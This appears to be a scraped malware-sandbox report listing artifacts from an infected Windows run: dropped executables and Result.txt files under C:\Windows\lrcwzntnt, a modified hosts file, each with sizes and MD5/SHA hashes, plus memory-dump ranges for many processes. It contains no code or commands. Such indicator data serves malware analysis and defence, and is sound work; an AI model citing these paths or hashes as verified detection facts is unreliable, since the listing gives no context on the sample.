c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\lrcwzntnt\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
738B

MD5
4863a27bd260d39aa29ed2972111b37e

SHA1
bbdd96060b57daf004975e4b5f7515322b30d9e1

SHA256
73a2bc9163beebc1d1509fd06d0f92bfc49cfe602fcc72d808537d4823042135

SHA512
405e61e4409269d96ede197238507510dfde7ade04a317c04ac1d71ac154ca946ab67132a6f36a7cfd6caa6158527601bf3f8d52ffaffa53f5845a055777c950

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
1KB

MD5
d12043d3fca40fab90994b8461038f00

SHA1
1ca9d997b022b89d56dacb3c0f4c8b1329daf5d0

SHA256
8342d7bdbc93f564503bea271e2dca8239f3f4f8ed468d03378d8555bccf588b

SHA512
a47edade92316d868335b5e1f52fe89ecb5525d366cac8214cad0610945dac7f366d0071bab79f93f4263a7aceadd84051809442246fb56909756d91907395ae

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
1KB

MD5
1b1243bc3e05c62b5fc78b226b62168c

SHA1
671494ecc35f97b8fa48b8b11b9c883565fae174

SHA256
00d38d19378747e5c79c56e88ff648fea6ed749e817642d611dfc6afca215731

SHA512
b5ecf29946adbe0499738081d95ebcf4ad0c3b1b594a60fd5d35988e262aba8885257fe41c8e884fee52575af1d985f8267033ededbc3ad3bf010696ebac503b

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
2KB

MD5
bd688d619dd1626bdc9053e082e76e06

SHA1
f2020b80573a2f90ceff0109174a70c4295eb199

SHA256
5951cad85209ccc3bc5d7ed7358ffd3d18c26e5b7a303b188daa3e0236869d76

SHA512
9bec37e0454451c436dc19830a2e17a527f94569d1718c18a95c2f635f4f1cb64518ce42e00d44047dfb4d685c9b2d736b9f771b5b65cfca80f1a16e307e2e15

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
2KB

MD5
c5a2926b13536d3e0c22afd309a83b39

SHA1
db32cbfd2b8df9848971d2cd58eb525df8bc0e0b

SHA256
5c7987cf0b3cc532098fea2323afe51b99e613b1c7f27432bcbac4833157b72b

SHA512
74401b0137289e81004df787ee01aa1508b6b20744bcd3be13ba1eca8c1b8422ff4a863118e39997fc7d8e1c33e518e27e5d40127e7ec3991ea1ebd57425d743

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
3KB

MD5
5f9877853d42c101c157b22cc42c16b9

SHA1
16d7330aa4fa6598e6f43be5ef2b956b6ab08d2e

SHA256
0e3aba6c5d8951fb790067dfbe608b04eff733a630caa1c87a846c07c4f1c8ab

SHA512
7e56b347cb13517bf06a5cbdf9db4695eb9b05855d3b946a2202d7984b9658e20083ccc70537a56b6a26b5eb4be9a801935c8c8f20190306f0fb85e3b10f191b

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
3KB

MD5
c1b6576ce7ea03847e46a878344c25f0

SHA1
6a1b9d35cba58d3a96d8dc363b1f11161f6a823c

SHA256
389eebb133caa51fcdfc869729e68e8280b35a5c10e50153b3b12882b3a6d435

SHA512
a63390cb8e0fdbb970e35b549b4c5456e7df9e7a1ff239f463af50a44a58054d54f6eb0ad34e92195af8d353e9c3c7907ab85073671cc00035087fd476096ad3

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
3KB

MD5
391c7050f77e1b6c3c2516533a938ac1

SHA1
dce4eaaa56c4af2d46a8b6f96f2b6d87b38727fa

SHA256
37020e037a84aa55f248f902380a3429e11c6b5dadad73bd60e6411f9f3fdeb2

SHA512
51ed73845d5a076d2a0be5d36b001c053b1ed3c24f7934d3136d1cdaaf0b437be87000c6974c179447e2733d8b4c6d2267c8c3ddbd71fd0c74d7066d75c2a338

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

Filesize
4KB

MD5
9d0e8dc0af384e004fcbdddc86883005

SHA1
493a79d152ca19408bb7a103287d36ba8c817ca2

SHA256
160f34b1125b18766c5a4cc3fb7b32cee5a05c7f2b85bda16b84d8e95045f0e9

SHA512
8bdc5de16ca92d70ba67e4573a50874e711579fda56501cb0f09ee6d99128c9e77bc47da35c7889161f11e504145ed04951bd68df900f751de570e335442db50

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\uzepkltb\zyejeil.exe

Filesize
9.4MB

MD5
a2a399513e0f841c44c28c9329bebc38

SHA1
06aed14a3f78a0ff4a12ccce05320289e8a4f10a

SHA256
c20158783c5d85153fd2b4b911a702ca15eab73da709e5588693d8fce9739de6

SHA512
d3f8110169abd0940063933de2718433fa9261d2af569ccd9f5f8ae7f7671c68bffa65598f589067e38439902ce61f588e3a1630fa45f03cee5e7f076243b3ce

Download Submit
memory/452-180-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/524-178-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-758-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-502-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-168-0x000002595D720000-0x000002595D730000-memory.dmp

Filesize
64KB

Download
memory/524-757-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-204-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-500-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-225-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-249-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-498-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-236-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-182-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-216-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/524-165-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp

Filesize
1.1MB

Download
memory/1048-219-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/1172-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1172-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1568-235-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/1628-248-0x00000000009D0000-0x00000000009E2000-memory.dmp

Filesize
72KB

Download
memory/1820-197-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/1916-233-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/1984-185-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/2024-171-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/2152-228-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/2480-201-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/2908-144-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2908-162-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3252-160-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/3252-156-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/3656-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4024-231-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4280-136-0x00007FF743F30000-0x00007FF74401E000-memory.dmp

Filesize
952KB

Download
memory/4280-138-0x00007FF743F30000-0x00007FF74401E000-memory.dmp

Filesize
952KB

Download
memory/4340-206-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4400-223-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4468-214-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4488-193-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4708-210-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/4868-175-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/5000-238-0x00007FF673550000-0x00007FF6735AB000-memory.dmp

Filesize
364KB

Download
memory/5112-78-0x00000000011A0000-0x00000000011EC000-memory.dmp

Filesize
304KB

Download